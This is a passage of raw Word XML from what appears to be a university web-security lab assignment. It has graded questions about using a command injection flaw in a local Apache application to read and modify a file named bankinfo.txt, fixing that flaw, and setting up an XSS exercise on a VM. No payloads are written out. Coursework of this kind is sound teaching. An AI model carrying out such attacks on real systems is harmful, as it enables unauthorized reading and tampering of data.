        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DF660E" w14:textId="23B0F29E" w:rsidR="00500932" w:rsidRDefault="00624EE6" w:rsidP="009943B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005733B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What are the permissions that you have assigned to the confidential directory and</w:t>
      </w:r>
      <w:r w:rsidR="005733B0" w:rsidRPr="005733B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005733B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>the ban</w:t>
      </w:r>
      <w:r w:rsidR="00560472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kinfo.txt file (you can run ls -</w:t>
      </w:r>
      <w:r w:rsidRPr="005733B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>l and copy the results from the screen)?</w:t>
      </w:r>
      <w:r w:rsidR="00FE05B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00750BB5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00FE05B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635AEAE5" w14:textId="77777777" w:rsidR="00144D60" w:rsidRDefault="00144D60" w:rsidP="00831976">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31F23BCB" w14:textId="77777777" w:rsidR="008C154F" w:rsidRDefault="008C154F" w:rsidP="00831976">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34ECA41A" w14:textId="37F5DFF0" w:rsidR="00DF5B14" w:rsidRPr="00DF5B14" w:rsidRDefault="00D747A1" w:rsidP="00B654DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF5B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Demonstrate that you can take advantage of the above</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF5B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF5B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>identified vulnerability to</w:t>
      </w:r>
      <w:r w:rsidR="00173F26" w:rsidRPr="00DF5B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF5B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">read the </w:t>
      </w:r>
      <w:r w:rsidR="007410D2" w:rsidRPr="00DF5B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF5B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ontent of bankinfo.txt by only using a browser on any computer. You</w:t>
      </w:r>
      <w:r w:rsidR="00173F26" w:rsidRPr="00DF5B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF5B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>need to provide the details about the attack procedure, input, and the</w:t>
      </w:r>
      <w:r w:rsidR="00173F26" w:rsidRPr="00DF5B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF5B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>corresponding output.</w:t>
      </w:r>
      <w:r w:rsidR="00597AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="007204BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00597AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75604C9D" w14:textId="77777777" w:rsidR="00083924" w:rsidRDefault="00083924" w:rsidP="00D04072">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6814B4" w14:textId="77777777" w:rsidR="008C154F" w:rsidRDefault="008C154F" w:rsidP="00D04072">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55EF05FF" w14:textId="77777777" w:rsidR="005D0236" w:rsidRDefault="00BD206E" w:rsidP="005D0236">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B266B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Demonstrate that you can take advantage of the above</w:t>
      </w:r>
      <w:r w:rsidRPr="00B266B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B266B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>identified vulnerability to</w:t>
      </w:r>
      <w:r w:rsidR="00B266B0" w:rsidRPr="00B266B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B266B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>change the content of bankinfo.txt (still only using a browser on any computer) to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC5E1DA" w14:textId="77777777" w:rsidR="005D0236" w:rsidRPr="00B67F53" w:rsidRDefault="0046494E" w:rsidP="007B6277">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B67F53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>I have $2,00,000 in my bank account. I am so happy because NO ONE can know this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B763659" w14:textId="54079978" w:rsidR="00C90ECA" w:rsidRDefault="00264DEA" w:rsidP="00A41BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00264DEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>That is, only the amount of the money is doubled. The size of the bankinfo.txt file</w:t>
      </w:r>
      <w:r w:rsidR="005106F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00264DEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>does not change. You need to provide the details about the attack procedure, input,</w:t>
      </w:r>
      <w:r w:rsidR="005106F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00264DEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>and the corresponding output.</w:t>
      </w:r>
      <w:r w:rsidR="00205065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410FB91E" w14:textId="77777777" w:rsidR="00B5786E" w:rsidRDefault="00B5786E" w:rsidP="00B5786E">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="133D8400" w14:textId="77777777" w:rsidR="008C154F" w:rsidRDefault="008C154F" w:rsidP="00B5786E">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39FDAE25" w14:textId="23A1C79F" w:rsidR="00651DC7" w:rsidRDefault="0030026A" w:rsidP="00C16F3E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000869E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Analyze why such a confidential file outside of the Apache www directory can be</w:t>
      </w:r>
      <w:r w:rsidR="000869E0" w:rsidRPr="000869E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000869E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>read and modified.</w:t>
      </w:r>
      <w:r w:rsidR="000976C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540E997B" w14:textId="77777777" w:rsidR="00094175" w:rsidRDefault="00094175" w:rsidP="0090675B">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F22EDEE" w14:textId="77777777" w:rsidR="008C154F" w:rsidRDefault="008C154F" w:rsidP="0090675B">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0EB308" w14:textId="77777777" w:rsidR="00094175" w:rsidRPr="00094175" w:rsidRDefault="00212CAA" w:rsidP="004C0127">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00212CAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Propose a solution to fix the command injection vulnerability in this Web application. Also</w:t>
      </w:r>
      <w:r w:rsidR="001B437E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00212CAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>propose a solution to further reduce the potential risks that can be introduced by the Apache</w:t>
      </w:r>
      <w:r w:rsidR="001B437E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00212CAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>server to this Linux system (Hint: for this solution, you can either consider enforcing file</w:t>
      </w:r>
      <w:r w:rsidR="001B437E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00212CAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>create/access policies or consider changing Apache configurations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F6FF23" w14:textId="77777777" w:rsidR="00901804" w:rsidRDefault="00901804" w:rsidP="00901804">
      <w:pPr>
        <w:ind w:left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Question </w:t>
      </w:r>
      <w:r w:rsidR="00F55CC6"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>: (15 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA6DB9F" w14:textId="77777777" w:rsidR="00901804" w:rsidRDefault="00056FE5" w:rsidP="00056FE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00056FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Describe your solutions and verifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724450FA" w14:textId="77777777" w:rsidR="008C154F" w:rsidRDefault="008C154F" w:rsidP="002228D9">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E38E71" w14:textId="77777777" w:rsidR="00856089" w:rsidRDefault="00967072" w:rsidP="002228D9">
      <w:pPr>
        <w:ind w:left="10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14:paraId="51DC5633" w14:textId="77777777" w:rsidR="002228D9" w:rsidRDefault="00F236CF" w:rsidP="00F236CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F236CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cross Site Scripting (XSS) attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE3B181" w14:textId="77777777" w:rsidR="002F1243" w:rsidRDefault="002F1243" w:rsidP="002F1243">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="161D6693" w14:textId="77777777" w:rsidR="00DC188F" w:rsidRDefault="007E3E37" w:rsidP="00DC188F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3E37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Host the XSS Web application on your </w:t>
      </w:r>
      <w:r w:rsidR="00597A9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3E37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>pache Web server by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F4DE89" w14:textId="77777777" w:rsidR="007A4CDC" w:rsidRDefault="007A4CDC" w:rsidP="00D245A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC188F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Copy “</w:t>
      </w:r>
      <w:r w:rsidR="00D245A8" w:rsidRPr="00D245A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>XSS.tar.gz</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC188F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>” to your VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D09EC09" w14:textId="77777777" w:rsidR="004016A4" w:rsidRDefault="00E06E33" w:rsidP="001F3D2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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</w:t>
      </w:r>
      <w:r w:rsidR="001F3D2F" w:rsidRPr="001F3D2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">xtract </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001F3D2F" w:rsidRPr="001F3D2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>the .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001F3D2F" w:rsidRPr="001F3D2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tar.gz file to the appropriate directory of the Apache 2 Web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B0ECF1" w14:textId="77777777" w:rsidR="007A4CDC" w:rsidRDefault="006963EE" w:rsidP="00FD230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D7963">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00C0093B" w:rsidRPr="004D7963">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>roperly set the permissions of the extracted directory and files so that webpages in the</w:t>
      </w:r>
      <w:r w:rsidR="00FF1A09" w:rsidRPr="004D7963">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C0093B" w:rsidRPr="004D7963">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS directory can be properly accessed by anyone through a Web browser, </w:t>
      </w:r>
      <w:r w:rsidR="00C11CBD" w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">e.g., by typing: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="0098161F" w:rsidRPr="00C42527">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://192.168.65.128/XSS/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C11CBD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> in which that IP address is for my VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7E860E" w14:textId="77777777" w:rsidR="004D76CE" w:rsidRPr="004D76CE" w:rsidRDefault="004D76CE" w:rsidP="004D76CE">
      <w:pPr>
        <w:ind w:left="792"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E9C33F" w14:textId="77777777" w:rsidR="00762CB9" w:rsidRDefault="006068F3" w:rsidP="00E34DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006068F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Visit the XSS Web application using a browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F3FA9D" w14:textId="77777777" w:rsidR="000052BE" w:rsidRDefault="00181E67" w:rsidP="007B6795">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0F09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>You will see two links as shown below. click the “First, visit this page!” link to visit</w:t>
      </w:r>
      <w:r w:rsidR="006F0F09" w:rsidRPr="006F0F09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0F09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>setgetcookie.htm</w:t>
      </w:r>
      <w:r w:rsidR="00541DC5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE231C0" w14:textId="77777777" w:rsidR="00010F1C" w:rsidRDefault="00AF642F" w:rsidP="00010F1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3564A684" wp14:editId="7154DBEF">
            <wp:extent cx="1495425" cy="108585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495425" cy="1085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29B6EFD" w14:textId="77777777" w:rsidR="00B97DC8" w:rsidRDefault="006039E7" w:rsidP="008A33E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B26349">
